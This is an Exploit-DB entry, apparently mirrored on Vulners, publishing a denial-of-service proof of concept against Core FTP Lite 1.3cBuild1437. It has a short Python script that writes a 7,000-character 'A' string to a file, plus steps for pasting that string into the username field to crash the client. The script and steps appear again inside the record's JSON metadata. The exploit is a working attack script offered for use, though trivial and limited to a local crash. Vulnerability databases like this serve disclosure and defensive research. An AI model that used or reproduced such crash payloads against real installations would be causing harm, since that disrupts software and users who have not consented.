Search...

Core FTP Lite 1.3 - Denial of Service (PoC)

2020-02-20T00:00:00

ID EDB-ID:48100
Type exploitdb
Reporter Exploit-DB
Modified 2020-02-20T00:00:00

Description

                                        
                                            # Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: http://www.coreftp.com/
# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit

# First step , Run exploit script, it will generate a new file with the name "mi.txt"
# Then start Core FTP application and find the "username" textbox.
# After that pate the content of "mi.txt" in to the "username" field like this --&gt; "AAAAAAAAA"
# Don't need to click anything because application is already crash.

This is the code :


#!/usr/bin/python
    
b0f = "A" * 7000
payload = b0f
try:
    f=open("mi.txt","w")
    print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created :) "
except:
    print "File cannot be created :(("

JSON Vulners Source

Initial Source

{"id": "EDB-ID:48100", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Core FTP Lite 1.3 - Denial of Service (PoC)", "description": "", "published": "2020-02-20T00:00:00", "modified": "2020-02-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/48100", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2020-02-20T13:33:32", "viewCount": 56, "enchantments": {"dependencies": {"references": [], "modified": "2020-02-20T13:33:32", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-02-20T13:33:32", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://www.exploit-db.com/download/48100", "sourceData": "# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)\r\n# Exploit Author: Berat Isler\r\n# Date: 2020-02-20\r\n# Vendor Homepage: http://www.coreftp.com/\r\n# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437\r\n# Version: Core FTP 1.3cBuild1437\r\n# Tested on : Windows 7 32-bit\r\n\r\n# First step , Run exploit script, it will generate a new file with the name \"mi.txt\"\r\n# Then start Core FTP application and find the \"username\" textbox.\r\n# After that pate the content of \"mi.txt\" in to the \"username\" field like this --> \"AAAAAAAAA\"\r\n# Don't need to click anything because application is already crash.\r\n\r\nThis is the code :\r\n\r\n\r\n#!/usr/bin/python\r\n \r\nb0f = \"A\" * 7000\r\npayload = b0f\r\ntry:\r\n f=open(\"mi.txt\",\"w\")\r\n print \"[+] Creating %s bytes payload generated .. .. ..\" %len(payload)\r\n f.write(payload)\r\n f.close()\r\n print \"[+] File created :) \"\r\nexcept:\r\n print \"File cannot be created :((\"", "osvdbidlist": []}